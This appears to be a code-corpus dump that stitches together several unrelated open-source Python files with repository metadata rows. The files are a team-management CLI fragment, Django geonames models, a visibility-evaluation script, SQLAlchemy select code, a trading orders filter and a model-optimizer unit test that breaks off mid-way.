@util.database_rows
def list(rows):
"""Print all teams."""
util.run_sql(f"""
SELECT tid, uid FROM teams
ORDER BY tid, uid DESC
""", rows=rows)
@cli.command()
@util.with_database()
@click.argument("old-name")
@click.argument("new-name")
def rename(old_name, new_name):
"""Change a team name."""
with r8.db:
old_exists = r8.db.execute("SELECT COUNT(*) FROM teams WHERE tid = ?", (old_name,)).fetchone()[0]
if not old_exists:
raise click.UsageError("Old team does not exist.")
new_exists = r8.db.execute("SELECT COUNT(*) FROM teams WHERE tid = ?", (new_name,)).fetchone()[0]
if new_exists:
raise click.UsageError("New team name does already exist.")
r8.db.execute("UPDATE teams SET tid = ? WHERE tid = ?", (new_name, old_name))
r8.echo("r8", f"""Renamed "{old_name}" to "{new_name}".""")
| 26.897436
| 105
| 0.624404
|
cccb09892483f6ae03bbe724290901da9613e607
| 13,621
|
py
|
Python
|
models.py
|
philippWassibauer/geonames
|
a479c5d903924af24dbd35b1caeab66a2d93fdd3
|
[
"MIT"
] | null | null | null |
models.py
|
philippWassibauer/geonames
|
a479c5d903924af24dbd35b1caeab66a2d93fdd3
|
[
"MIT"
] | null | null | null |
models.py
|
philippWassibauer/geonames
|
a479c5d903924af24dbd35b1caeab66a2d93fdd3
|
[
"MIT"
] | 1
|
2020-01-23T05:03:22.000Z
|
2020-01-23T05:03:22.000Z
|
# This file is part of Django-Geonames
# Copyright (c) 2008, Alberto Garcia Hierro
# See LICENSE file for details
from math import sin, cos, acos, radians
from django.core.cache import cache
from django.db import connection
from django.contrib.gis.db import models
from django.utils.translation import ugettext, get_language
from django.conf import settings
from geonames.decorators import stored_property, cache_set
GLOBE_GEONAME_ID = 6295630
def translate_geoname(g, lang):
cursor = connection.cursor()
cursor.execute('''SELECT name FROM alternate_name WHERE language='%(lang)s' \
AND geoname_id = %(id)d AND preferred=TRUE UNION SELECT name \
FROM alternate_name WHERE language='%(lang)s' AND geoname_id = %(id)d LIMIT 1''' % \
{ 'lang': lang, 'id': g.id })
try:
return cursor.fetchone()[0]
except TypeError:
return g.name
def get_geo_translate_func():
try:
cnf = settings.GEONAMES_TRANSLATION_METHOD
except AttributeError:
cnf = 'NOOP'
if cnf == 'NOOP':
return (lambda x: x.name)
if cnf == 'STATIC':
lang = settings.LANGUAGE_CODE.split('-')[0]
if lang == 'en':
return (lambda x: x.name)
def geo_translate(self):
key = 'Geoname_%s_i18n_name' % self.id
return cache.get(key) or cache_set(key, translate_geoname(self, lang))
return geo_translate
if cnf == 'DYNAMIC':
def geo_translate(self):
lang = get_language()
key = 'Geoname_%s_%s_i18n_name' % (self.id, lang)
return cache.get(key) or cache_set(key, translate_geoname(self, lang))
return geo_translate
raise ValueError('Unknown value for GEONAMES_TRANSLATION_METHOD: "%s"' % cnf)
geo_translate_func = get_geo_translate_func()
class Geoname(models.Model):
id = models.IntegerField(primary_key=True)
name = models.CharField(max_length=200, db_index=True)
ascii_name = models.CharField(max_length=200)
latitude = models.DecimalField(max_digits=20, decimal_places=17)
longitude = models.DecimalField(max_digits=20, decimal_places=17)
point = models.PointField(null=True, blank=True)
fclass = models.CharField(max_length=1, db_index=True)
fcode = models.CharField(max_length=10, db_index=True)
country = models.ForeignKey('Country', db_index=True, related_name='geoname_set')
cc2 = models.CharField(max_length=60)
admin1 = models.ForeignKey('Admin1Code', null=True, related_name='geoname_set', db_index=True)
admin2 = models.ForeignKey('Admin2Code', null=True, related_name='geoname_set', db_index=True)
admin3 = models.ForeignKey('Admin3Code', null=True, related_name='geoname_set', db_index=True)
admin4 = models.ForeignKey('Admin4Code', null=True, related_name='geoname_set', db_index=True)
population = models.IntegerField()
elevation = models.IntegerField()
gtopo30 = models.IntegerField()
timezone = models.ForeignKey('Timezone', null=True)
moddate = models.DateField()
objects = models.GeoManager()
class Meta:
db_table = 'geoname'
def __unicode__(self):
return self.name
def save(self, *args, **kwargs):
self.gpoint = 'POINT(%s %s)' % (self.longitude, self.latitude)
super(Geoname, self).save(*args, **kwargs)
@stored_property
def i18n_name(self):
return geo_translate_func(self)
@stored_property
def admin1_i18n_name(self):
if self.fcode in ('', 'CONT', 'PCLI'):
return u''
try:
return self.admin1.geoname.i18n_name
except (Admin1Code.DoesNotExist, Geoname.DoesNotExist):
return u''
@stored_property
def fcode_name(self):
try:
return ugettext(FeatureCode.objects.get(pk=self.fcode).name)
except FeatureCode.DoesNotExist:
return u''
@stored_property
def country_name(self):
try:
return self.country.__unicode__()
except Country.DoesNotExist:
return u''
@stored_property
def country_i18n_name(self):
try:
return self.country.geoname.i18n_name
except models.Model.DoesNotExist:
return u''
@stored_property
def parent(self):
if self.id == GLOBE_GEONAME_ID:
return None
return self.get_parent
def get_parent(self):
if self.fcode == 'CONT':
return Geoname.globe()
if self.fcode.startswith('PCL'):
g_list = [self.country.continent]
elif self.fcode in ('ADM1', 'ADMD'):
g_list = [self.country, self.country.continent]
elif self.fcode == 'ADM2':
g_list = [self.admin1, self.country, self.country.continent]
elif self.fcode == 'ADM3':
g_list = [self.admin2, self.admin1, self.country, self.country.continent]
elif self.fcode == 'ADM4':
g_list = [self.admin3, self.admin2, self.admin1, self.country, self.country.continent]
else:
g_list = [self.admin4, self.admin3, self.admin2, self.admin1, self.country, self.country.continent]
for g in g_list:
try:
if g.geoname_id != self.id:
return g.geoname
except AttributeError:
pass
return None
@stored_property
def hierarchy(self):
hier = []
parent = self.parent
while parent:
hier.append(parent)
parent = parent.parent
return hier
def get_children(self):
if self.id == GLOBE_GEONAME_ID:
return Geoname.objects.filter(id__in=[x['geoname'] for x in Continent.objects.values('geoname')])
if self.fcode == 'CONT':
return Geoname.objects.filter(id__in=[x['geoname'] for x in Continent.objects.get(geoname=self.id).country_set.values('geoname')])
if self.fclass != 'A':
return Geoname.objects.none()
try:
if self.fcode.startswith('PCL'):
s_list = [self.country.geoname_set.filter(fcode=code) for code in ('ADM1', 'ADMD', 'ADM2', 'ADM3', 'ADM4')] + [self.country.geoname_set.filter(fclass='P')]
elif self.fcode == 'ADM1':
s_list = [self.admin1.geoname_set.filter(fcode=code) for code in ('ADM2', 'ADM3', 'ADM4')] + [self.admin1.geoname_set.filter(fclass='P')]
elif self.fcode == 'ADM2':
s_list = [self.admin2.geoname_set.filter(fcode=code) for code in ('ADM3', 'ADM4')] + [self.admin2.geoname_set.filter(fclass='P')]
elif self.fcode == 'ADM3':
s_list = [self.admin3.geoname_set.filter(fcode='ADM4'), self.admin3.geoname_set.filter(fclass='P')]
elif self.fcode == 'ADM4':
s_list = [self.admin4.geoname_set.filter(fclass='P')]
else:
return Geoname.objects.none()
except AttributeError:
return Geoname.objects.none()
for qs in s_list:
if qs.count():
return qs
return Geoname.objects.none()
@stored_property
def children(self):
cset = self.get_children()
l = list(cset or [])
l.sort(cmp=lambda x,y: cmp(x.i18n_name, y.i18n_name))
return l
@classmethod
def biggest(cls, lset):
codes = [ '', 'CONT', 'PCLI', 'ADM1', 'ADM2', 'ADM3', 'ADM4', 'PPL']
for c in codes:
for item in lset:
if item.fcode == c:
return item
try:
return lset[0]
except IndexError:
return None
@classmethod
def globe(cls):
return cls.objects.get(pk=GLOBE_GEONAME_ID)
def is_globe(self):
return self.id == GLOBE_GEONAME_ID
def contains(self, child):
if self.is_globe():
return True
try:
if self.fcode == 'CONT':
return child.country.continent.geoname == self
if self.fcode in ('PCLI', 'PCLD'):
return child.country_id == self.country_id
if self.fcode == 'ADM1':
return self.admin1_id == child.admin1_id
if self.fcode == 'ADM2':
return self.admin2_id == child.admin2_id
if self.fcode == 'ADM3':
return self.admin3_id == child.admin3_id
if self.fcode == 'ADM4':
return self.admin4_id == child.admin4_id
except Country.DoesNotExist:
return False
return False
def distance(self, other):
return Geoname.distance_points(self.latitude, self.longitude, other.latitude, other.longitude)
@classmethod
def distance_points(cls, lat1, lon1, lat2, lon2, is_rad=False):
if not is_rad:
lat1, lon1, lat2, lon2 = map(lambda x: radians(float(x)), (lat1, lon1, lat2, lon2))
return 6378.7 * acos(sin(lat1) * sin(lat2) + cos(lat1) * cos(lat2) * cos(lon2 - lon1))
class GeonameAlternateName(models.Model):
id = models.IntegerField(primary_key=True)
geoname = models.ForeignKey(Geoname, related_name='altnames', db_index=True)
language = models.CharField(max_length=7)
name = models.CharField(max_length=200)
preferred = models.BooleanField()
short = models.BooleanField()
class Meta:
db_table = 'alternate_name'
def __unicode__(self):
return self.alternateName
class Continent(models.Model):
code = models.CharField(max_length=2, primary_key=True)
name = models.CharField(max_length=20)
geoname = models.ForeignKey(Geoname, unique=True)
class Meta:
db_table = 'continent'
def __unicode__(self):
return self.name
class Country(models.Model):
iso_alpha2 = models.CharField(max_length=2, primary_key=True)
iso_alpha3 = models.CharField(max_length=3, unique=True)
iso_numeric = models.IntegerField(unique=True)
fips_code = models.CharField(max_length=3)
name = models.CharField(max_length=200)
capital = models.CharField(max_length=200)
area = models.FloatField()
population = models.IntegerField()
continent = models.ForeignKey(Continent, db_index=True)
tld = models.CharField(max_length=4, null=True)
currency_code = models.CharField(max_length=3)
currency_name = models.CharField(max_length=16, null=True)
phone_prefix = models.CharField(max_length=16, null=True)
postal_code_fmt = models.CharField(max_length=64, null=True)
postal_code_re = models.CharField(max_length=256, null=True)
languages = models.CharField(max_length=200)
geoname = models.ForeignKey(Geoname, related_name='this_country')
neighbours = models.ManyToManyField('self')
class Meta:
db_table = 'country'
def __unicode__(self):
return self.name
class Language(models.Model):
iso_639_3 = models.CharField(max_length=4, primary_key=True)
iso_639_2 = models.CharField(max_length=50)
iso_639_1 = models.CharField(max_length=50)
language_name = models.CharField(max_length=200)
class Meta:
db_table = 'iso_language'
class Admin1Code(models.Model):
country = models.ForeignKey(Country, db_index=True)
geoname = models.ForeignKey(Geoname, db_index=True)
code = models.CharField(max_length=5)
name = models.TextField()
ascii_name = models.TextField()
geom = models.GeometryField(null=True, blank=True)
class Meta:
db_table = 'admin1_code'
class Admin2Code(models.Model):
country = models.ForeignKey(Country, db_index=True)
admin1 = models.ForeignKey(Admin1Code, null=True)
geoname = models.ForeignKey(Geoname, db_index=True)
code = models.CharField(max_length=30)
name = models.TextField()
ascii_name = models.TextField()
geom = models.GeometryField(null=True, blank=True)
class Meta:
db_table = 'admin2_code'
class Admin3Code(models.Model):
country = models.ForeignKey(Country, db_index=True)
admin1 = models.ForeignKey(Admin1Code, null=True, db_index=True)
admin2 = models.ForeignKey(Admin2Code, null=True, db_index=True)
geoname = models.ForeignKey(Geoname, db_index=True)
code = models.CharField(max_length=30)
name = models.TextField()
ascii_name = models.TextField()
geom = models.GeometryField(null=True, blank=True)
class Meta:
db_table = 'admin3_code'
class Admin4Code(models.Model):
country = models.ForeignKey(Country)
admin1 = models.ForeignKey(Admin1Code, null=True, db_index=True)
admin2 = models.ForeignKey(Admin2Code, null=True, db_index=True)
admin3 = models.ForeignKey(Admin3Code, null=True, db_index=True)
geoname = models.ForeignKey(Geoname, db_index=True)
code = models.CharField(max_length=30)
name = models.TextField()
ascii_name = models.TextField()
geom = models.GeometryField(null=True, blank=True)
class Meta:
db_table = 'admin4_code'
class FeatureCode(models.Model):
code = models.CharField(max_length=7, primary_key=True)
fclass = models.CharField(max_length=1)
name = models.CharField(max_length=200)
description = models.TextField()
class Meta:
db_table = 'feature_code'
class Timezone(models.Model):
name = models.CharField(max_length=200)
gmt_offset = models.DecimalField(max_digits=4, decimal_places=2)
dst_offset = models.DecimalField(max_digits=4, decimal_places=2)
class Meta:
db_table = 'time_zone'
class GeonamesUpdate(models.Model):
updated_date = models.DateField()
class Meta:
db_table = 'geonames_update'
| 34.836317
| 171
| 0.647236
|
0ad6571627f4bc1eb4190c8061b453b2a9137ebe
| 5,061
|
py
|
Python
|
scripts/evaluate_solution.py
|
steven-murray/analytic_diffuse
|
b82fea27da4c476b4d04c2a0d8959e5af38bdd09
|
[
"MIT"
] | null | null | null |
scripts/evaluate_solution.py
|
steven-murray/analytic_diffuse
|
b82fea27da4c476b4d04c2a0d8959e5af38bdd09
|
[
"MIT"
] | null | null | null |
scripts/evaluate_solution.py
|
steven-murray/analytic_diffuse
|
b82fea27da4c476b4d04c2a0d8959e5af38bdd09
|
[
"MIT"
] | null | null | null |
# script to evaluate a given visibility solution and save to npz.
# optionally -- parse a pyuvdata-compatible file to get baseline vectors etc. and save alongside evaluated data.
# give model parameters (and name) as arguments. Option to parse a filename for that info too.
import numpy as np
import os
import argparse
from pyuvdata import UVData
from healvis.cosmology import c_ms
from healvis.utils import jy2Tsr
import analytic_diffuse as andiff
parser = argparse.ArgumentParser(
description="Evaluate a given visibility solution and save results to an npz file."
)
parser.add_argument('-v', '--visfile', type=str, help='pyuvdata-compatible visibility data file')
parser.add_argument('--infile', type=str, help='Input npz file containing uvw vectors')
helpstr = 'Model name. Available: ' + ', '.join(andiff.available_models)
parser.add_argument('--model', type=str, help=helpstr, default=None)
parser.add_argument('-a', type=float, help='a parameter for gaussian and xysincs models.', default=None)
parser.add_argument('--el0vec', type=str, help='(l,m,n) coordinate vector for center displacement from zenith. Comma-delimited string.', default=None, required=False)
parser.add_argument('--el0ang', type=str, help='(azimuth, zenith angle) coordinate vector for center position.', default=None)
parser.add_argument('--xi', type=float, help='Xi parameter for xysincs model.', default=None)
parser.add_argument('-n', type=int, help='Polynomial order for polydome model.', default=None)
parser.add_argument('--order', type=int, help='Expansion order, for series solutions.')
parser.add_argument('--amp', type=float, help='Amplitude of the model in. Default is 2 K.', default=2)
parser.add_argument('--maxu', type=float, help='Maximum baseline length in wavelengths.')
parser.add_argument('-o', '--ofname', type=str, help='Output npz file name', default=None)
args = parser.parse_args()
if args.el0vec is not None:
args.el0vec = list(map(float, args.el0vec.split(',')))
assert len(args.el0vec) == 3
if args.el0ang is not None:
args.el0ang = list(map(float, args.el0ang.split(',')))
assert len(args.el0ang) == 2
if args.el0vec is None:
args.el0vec = andiff.models._angle_to_lmn(*args.el0ang).squeeze()
args.el0vec[2] = 0 # Scrap w component
outdict = {}
sel = slice(None)
if args.maxu is not None:
sel = np.linalg.norm(uvw, axis=1) < args.maxu
uv = UVData()
if args.visfile is None:
if args.model is None:
raise ValueError("Model type needed.")
if args.infile is None:
raise ValueError("Input npz file needed.")
f = np.load(args.infile)
uvw = f['uvws']
uvw = uvw[sel]
elif args.visfile is not None and args.infile is not None:
raise ValueError("Cannot do both npz and uv input files at once.")
else:
uv.read(args.visfile)
print("Using visibility file {}".format(args.visfile))
uv.select(times=uv.time_array[0]) # Select first time only.
dat = uv.data_array[:,0,:,0]
lam = c_ms/uv.freq_array[0]
dat_Tsr = dat * jy2Tsr(uv.freq_array[0], bm=1.0)
uvw = np.repeat(uv.uvw_array[:,:,None], uv.Nfreqs, axis=2)
uvw = np.swapaxes((uvw/lam), 1,2)
uvw = uvw.reshape((uv.Nbls * uv.Nfreqs, 3))
dat_Tsr = dat_Tsr.flatten()
uvw = uvw[sel]
dat_Tsr = dat_Tsr[sel]
if args.model is None:
model, params = andiff.solutions.parse_filename(os.path.basename(args.visfile))
args.model = model
for k, v in params.items():
if (hasattr(args, k)) and (getattr(args, k) is None):
setattr(args, k, v)
outdict['dat_Tsr'] = dat_Tsr
outdict['uvws'] = uvw
for key, val in vars(args).items():
if val is not None:
outdict[key] = val
# Next -- evaluate function, then save things to npz file.
analytic = andiff.get_solution(args.model)
params = {}
keys = ['a', 'n', 'xi', 'el0vec', 'order']
for k in keys:
val = getattr(args, k)
if val is not None:
params[k] = val
if ('gauss' in args.model) or ('xysincs' in args.model):
a = params.pop('a')
if a is None:
raise ValueError("Missing parameter 'a' for {}.".format(args.model))
outdict['result'] = args.amp * analytic(uvw, a, **params)
params['a'] = a
else:
outdict['result'] = args.amp * analytic(uvw, **params)
if args.ofname is None:
if args.infile is None:
args.ofname = "ana_comp_"+args.model
else:
args.ofname = "ana_eval_"+args.model # Comp for data comp, eval for just evaluation
for k, val in params.items():
if isinstance(val, int):
args.ofname += '_{}{:d}'.format(k, val)
elif k == 'el0vec':
zenang = np.degrees(np.arcsin(np.linalg.norm(val)))
args.ofname += '_offzen{:.1f}'.format(zenang)
else:
args.ofname += '_{}{:.2f}'.format(k, val)
if 'nside' in uv.extra_keywords.keys():
args.ofname += '_nside{}'.format(uv.extra_keywords['nside'])
args.ofname += ".npz"
print("Saving results to {}".format(args.ofname))
np.savez(args.ofname, **outdict)
| 38.052632
| 166
| 0.666469
|
407ec963320ad44058cec9b738a0fe93b423899c
| 5,287
|
py
|
Python
|
lib/sqlalchemy/future/selectable.py
|
abrahamsangha/sqlalchemy
|
3ab2364e78641c4f0e4b6456afc2cbed39b0d0e6
|
[
"MIT"
] | null | null | null |
lib/sqlalchemy/future/selectable.py
|
abrahamsangha/sqlalchemy
|
3ab2364e78641c4f0e4b6456afc2cbed39b0d0e6
|
[
"MIT"
] | null | null | null |
lib/sqlalchemy/future/selectable.py
|
abrahamsangha/sqlalchemy
|
3ab2364e78641c4f0e4b6456afc2cbed39b0d0e6
|
[
"MIT"
] | null | null | null |
from ..sql import coercions
from ..sql import roles
from ..sql.base import _generative
from ..sql.selectable import GenerativeSelect
from ..sql.selectable import Select as _LegacySelect
from ..sql.selectable import SelectState
from ..sql.util import _entity_namespace_key
class Select(_LegacySelect):
_is_future = True
_setup_joins = ()
_legacy_setup_joins = ()
@classmethod
def _create_select(cls, *entities):
raise NotImplementedError("use _create_future_select")
@classmethod
def _create_future_select(cls, *entities):
r"""Construct a new :class:`_expression.Select` using the 2.
x style API.
.. versionadded:: 2.0 - the :func:`_future.select` construct is
the same construct as the one returned by
:func:`_expression.select`, except that the function only
accepts the "columns clause" entities up front; the rest of the
state of the SELECT should be built up using generative methods.
Similar functionality is also available via the
:meth:`_expression.FromClause.select` method on any
:class:`_expression.FromClause`.
.. seealso::
:ref:`coretutorial_selecting` - Core Tutorial description of
:func:`_expression.select`.
:param \*entities:
Entities to SELECT from. For Core usage, this is typically a series
of :class:`_expression.ColumnElement` and / or
:class:`_expression.FromClause`
objects which will form the columns clause of the resulting
statement. For those objects that are instances of
:class:`_expression.FromClause` (typically :class:`_schema.Table`
or :class:`_expression.Alias`
objects), the :attr:`_expression.FromClause.c`
collection is extracted
to form a collection of :class:`_expression.ColumnElement` objects.
This parameter will also accept :class:`_expression.TextClause`
constructs as
given, as well as ORM-mapped classes.
"""
self = cls.__new__(cls)
self._raw_columns = [
coercions.expect(
roles.ColumnsClauseRole, ent, apply_propagate_attrs=self
)
for ent in entities
]
GenerativeSelect.__init__(self)
return self
def filter(self, *criteria):
"""A synonym for the :meth:`_future.Select.where` method."""
return self.where(*criteria)
def _exported_columns_iterator(self):
meth = SelectState.get_plugin_class(self).exported_columns_iterator
return meth(self)
def _filter_by_zero(self):
if self._setup_joins:
meth = SelectState.get_plugin_class(
self
).determine_last_joined_entity
_last_joined_entity = meth(self)
if _last_joined_entity is not None:
return _last_joined_entity
if self._from_obj:
return self._from_obj[0]
return self._raw_columns[0]
def filter_by(self, **kwargs):
r"""apply the given filtering criterion as a WHERE clause
to this select.
"""
from_entity = self._filter_by_zero()
clauses = [
_entity_namespace_key(from_entity, key) == value
for key, value in kwargs.items()
]
return self.filter(*clauses)
@property
def column_descriptions(self):
"""Return a 'column descriptions' structure which may be
plugin-specific.
"""
meth = SelectState.get_plugin_class(self).get_column_descriptions
return meth(self)
@_generative
def join(self, target, onclause=None, isouter=False, full=False):
r"""Create a SQL JOIN against this :class:`_expresson.Select`
object's criterion
and apply generatively, returning the newly resulting
:class:`_expression.Select`.
"""
target = coercions.expect(
roles.JoinTargetRole, target, apply_propagate_attrs=self
)
self._setup_joins += (
(target, onclause, None, {"isouter": isouter, "full": full}),
)
@_generative
def join_from(
self, from_, target, onclause=None, isouter=False, full=False
):
r"""Create a SQL JOIN against this :class:`_expresson.Select`
object's criterion
and apply generatively, returning the newly resulting
:class:`_expression.Select`.
"""
# note the order of parsing from vs. target is important here, as we
# are also deriving the source of the plugin (i.e. the subject mapper
# in an ORM query) which should favor the "from_" over the "target"
from_ = coercions.expect(
roles.FromClauseRole, from_, apply_propagate_attrs=self
)
target = coercions.expect(
roles.JoinTargetRole, target, apply_propagate_attrs=self
)
self._setup_joins += (
(target, onclause, from_, {"isouter": isouter, "full": full}),
)
def outerjoin(self, target, onclause=None, full=False):
"""Create a left outer join.
"""
return self.join(target, onclause=onclause, isouter=True, full=full,)
| 32.435583
| 78
| 0.632117
|
161ab0379c67974e3c7c09f7565ed3a6a49d5275
| 5,218
|
py
|
Python
|
qf_lib/backtesting/orders_filter/volume_orders_filter.py
|
quarkfin/QF-Lib
|
1504c65c9ed8bbbd19948088fe7b924a7b6be709
|
[
"Apache-2.0"
] | null | null | null |
qf_lib/backtesting/orders_filter/volume_orders_filter.py
|
quarkfin/QF-Lib
|
1504c65c9ed8bbbd19948088fe7b924a7b6be709
|
[
"Apache-2.0"
] | null | null | null |
qf_lib/backtesting/orders_filter/volume_orders_filter.py
|
quarkfin/QF-Lib
|
1504c65c9ed8bbbd19948088fe7b924a7b6be709
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016-present CERN – European Organization for Nuclear Research
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
from typing import List, Optional, Tuple
import numpy as np
from qf_lib.backtesting.order.execution_style import StopOrder
from qf_lib.backtesting.order.order import Order
from qf_lib.backtesting.orders_filter.orders_filter import OrdersFilter
from qf_lib.common.enums.frequency import Frequency
from qf_lib.common.enums.price_field import PriceField
from qf_lib.common.tickers.tickers import Ticker
from qf_lib.common.utils.numberutils.is_finite_number import is_finite_number
from qf_lib.containers.dataframe.qf_dataframe import QFDataFrame
from qf_lib.data_providers.data_provider import DataProvider
class VolumeOrdersFilter(OrdersFilter):
""" Verifies whether the orders sizes do not exceed the given volume limit.
Parameters
-----------
data_provider: DataProvider
used to download the volume data
volume_percentage_limit: float
defines the maximum percentage of the volume value, that the orders size should not exceed
"""
def __init__(self, data_provider: DataProvider, volume_percentage_limit: float):
super().__init__(data_provider)
self._volume_percentage_limit = volume_percentage_limit
def adjust_orders(self, orders: List[Order]) -> List[Order]:
""" Takes list of orders and based on them creates a new list with orders, whose size does not to exceed the
given volume limits. The Orders are changed in place.
Parameters
----------
orders: List[Order]
list of orders to adjust
Returns
--------
List[Order]
list of orders, that do not exceed the given volume percentage limit
"""
tickers = [order.ticker for order in orders]
try:
volume_df = self._data_provider.historical_price(tickers, PriceField.Volume, 5, frequency=Frequency.DAILY)
# The stop orders will be adjusted only along with corresponding market orders
stop_orders_dict = {order.ticker: order for order in orders if isinstance(order.execution_style, StopOrder)}
adjusted_orders_tuples = [self._adjust_quantity(order, stop_orders_dict.get(order.ticker, None), volume_df)
for order in orders if not isinstance(order.execution_style, StopOrder)]
# Flatten the list of orders tuples
adjusted_orders = [order for orders_tuple in adjusted_orders_tuples
for order in orders_tuple if order is not None and order.quantity != 0]
return adjusted_orders
except ValueError as e:
self.logger.warning(f"VolumeOrdersFilter: orders cannot be adjusted due to the following reason: {e}",
stack_info=True)
return orders
def _adjust_quantity(self, order: Order, stop_order: Optional[Order], volume_df: QFDataFrame) -> \
Tuple[Order, Order]:
"""Returns order with adjusted quantity if applicable."""
ticker = order.ticker
def average_past_volume(ticker: Ticker) -> Optional[float]:
volume_series = volume_df[ticker]
volume_series = volume_series.dropna()
volume_series = volume_series[volume_series >= 0]
return volume_series.mean()
past_volume = average_past_volume(ticker)
if is_finite_number(past_volume):
volume_limit: int = math.floor(past_volume * self._volume_percentage_limit)
# Check if the order quantity exceeds the limit
if abs(order.quantity) > volume_limit:
final_quantity = volume_limit * np.sign(order.quantity)
adjustment_difference = final_quantity - order.quantity
self.logger.info("VolumeOrdersFilter: Quantity change {} "
"\n\tfinal quantity: {}".format(order, final_quantity))
order.quantity = final_quantity
if stop_order:
# Adjust the corresponding stop order
stop_order_final_quantity = stop_order.quantity - adjustment_difference
self.logger.info("VolumeOrdersFilter: Quantity change {} "
"\n\tfinal quantity: {}".format(stop_order, final_quantity))
stop_order.quantity = stop_order_final_quantity
return order, stop_order
def __str__(self):
return 'VolumeOrdersFilter:\n' \
'\tvolume_percentage_limit: {}\n'.format(self._volume_percentage_limit)
| 45.373913
| 120
| 0.673246
|
f82a49482c561a06c31f66897e3a6dc16406c335
| 7,295
|
py
|
Python
|
model-optimizer/mo/front/common/partial_infer/multi_box_detection_test.py
|
zhoub/dldt
|
e42c01cf6e1d3aefa55e2c5df91f1054daddc575
|
[
"Apache-2.0"
] | 3
|
2020-02-09T23:25:37.000Z
|
2021-01-19T09:44:12.000Z
|
model-optimizer/mo/front/common/partial_infer/multi_box_detection_test.py
|
zhoub/dldt
|
e42c01cf6e1d3aefa55e2c5df91f1054daddc575
|
[
"Apache-2.0"
] | null | null | null |
model-optimizer/mo/front/common/partial_infer/multi_box_detection_test.py
|
zhoub/dldt
|
e42c01cf6e1d3aefa55e2c5df91f1054daddc575
|
[
"Apache-2.0"
] | 2
|
2020-04-18T16:24:39.000Z
|
2021-01-19T09:42:19.000Z
|
"""
Copyright (c) 2018-2019 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import numpy as np
from mo.front.common.partial_infer.multi_box_detection import multi_box_detection_infer
from mo.graph.graph import Node
from mo.utils.unittest.graph import build_graph
nodes_attributes = {'node_1': {'value': None, 'kind': 'data'},
'node_2': {'value': None, 'kind': 'data'},
'node_3': {'value': None, 'kind': 'data'},
'detection_output_1': {'type': 'DetectionOutput', 'value': None, 'kind': 'op'},
'node_4': {'value': None, 'kind': 'data'}
}
class TestMultiBoxDetectionInfer(unittest.TestCase):
def test_prior_box_infer_ideal(self):
graph = build_graph(nodes_attributes,
[('node_1', 'detection_output_1'),
('node_2', 'detection_output_1'),
('node_3', 'detection_output_1'),
('detection_output_1', 'node_4')],
{'node_1': {'shape': np.array([1, 34928])},
'node_2': {'shape': np.array([1, 183372])},
'node_3': {'shape': np.array([1, 2, 34928])},
'detection_output_1': {"background_label_id": "0", "clip": "1",
"code_type": "caffe.PriorBoxParameter.CENTER_SIZE",
"confidence_threshold": "0.01", "keep_top_k": "200",
"nms_threshold": "0.5", "num_classes": "21",
"share_location": "1", "top_k": "200",
"variance_encoded_in_target": "0"},
'node_4': {'shape': np.array([1, 1, 200, 7])},
})
multi_box_detection_node = Node(graph, 'detection_output_1')
print(multi_box_detection_node)
multi_box_detection_infer(multi_box_detection_node)
exp_shape = np.array([1, 1, 200, 7])
res_shape = graph.node['node_4']['shape']
for i in range(0, len(exp_shape)):
self.assertEqual(exp_shape[i], res_shape[i])
self.assertEqual(multi_box_detection_node.background_label_id, '0')
self.assertEqual(multi_box_detection_node.clip, '1')
self.assertEqual(multi_box_detection_node.code_type, 'caffe.PriorBoxParameter.CENTER_SIZE')
self.assertEqual(multi_box_detection_node.confidence_threshold, '0.01')
self.assertEqual(multi_box_detection_node.keep_top_k, '200')
self.assertEqual(multi_box_detection_node.nms_threshold, '0.5')
self.assertEqual(multi_box_detection_node.num_classes, 21)
self.assertEqual(multi_box_detection_node.share_location, '1')
self.assertEqual(multi_box_detection_node.top_k, '200')
self.assertEqual(multi_box_detection_node.variance_encoded_in_target, '0')
def test_prior_box_infer_without_top_k(self):
graph = build_graph(nodes_attributes,
[('node_1', 'detection_output_1'),
('node_2', 'detection_output_1'),
('node_3', 'detection_output_1'),
('detection_output_1', 'node_4')],
{'node_1': {'shape': np.array([1, 34928])},
'node_2': {'shape': np.array([1, 183372])},
'node_3': {'shape': np.array([1, 2, 34928])},
'detection_output_1': {"background_label_id": "0", "clip": "1",
"code_type": "caffe.PriorBoxParameter.CENTER_SIZE",
"confidence_threshold": "0.01", "keep_top_k": -1,
"nms_threshold": "0.5", "num_classes": "21",
"share_location": "1", "top_k": -1,
"variance_encoded_in_target": "0"},
'node_4': {'shape': np.array([1, 1, 69856, 7])},
})
multi_box_detection_node = Node(graph, 'detection_output_1')
multi_box_detection_infer(multi_box_detection_node)
exp_shape = np.array([1, 1, 8732, 7])
res_shape = graph.node['node_4']['shape']
for i in range(0, len(exp_shape)):
self.assertEqual(exp_shape[i], res_shape[i])
self.assertEqual(multi_box_detection_node.background_label_id, '0')
self.assertEqual(multi_box_detection_node.clip, '1')
self.assertEqual(multi_box_detection_node.code_type, 'caffe.PriorBoxParameter.CENTER_SIZE')
self.assertEqual(multi_box_detection_node.confidence_threshold, '0.01')
self.assertEqual(multi_box_detection_node.keep_top_k, 8732)
self.assertEqual(multi_box_detection_node.nms_threshold, '0.5')
self.assertEqual(multi_box_detection_node.num_classes, 21)
self.assertEqual(multi_box_detection_node.share_location, '1')
self.assertEqual(multi_box_detection_node.top_k, -1)
self.assertEqual(multi_box_detection_node.variance_encoded_in_target, '0')
def test_prior_box_infer_raise_error(self):
graph = build_graph(nodes_attributes,
[('node_1', 'detection_output_1'),
('node_2', 'detection_output_1'),
('node_3', 'detection_output_1'),
('detection_output_1', 'node_4')],
{'node_1': {'shape': np.array([1, 34928])},
'node_2': {'shape': np.array([1, 183372])},
'node_3': {'shape': np.array([1, 3, 34928])},
'detection_output_1': {"background_label_id": "0", "clip": "1",
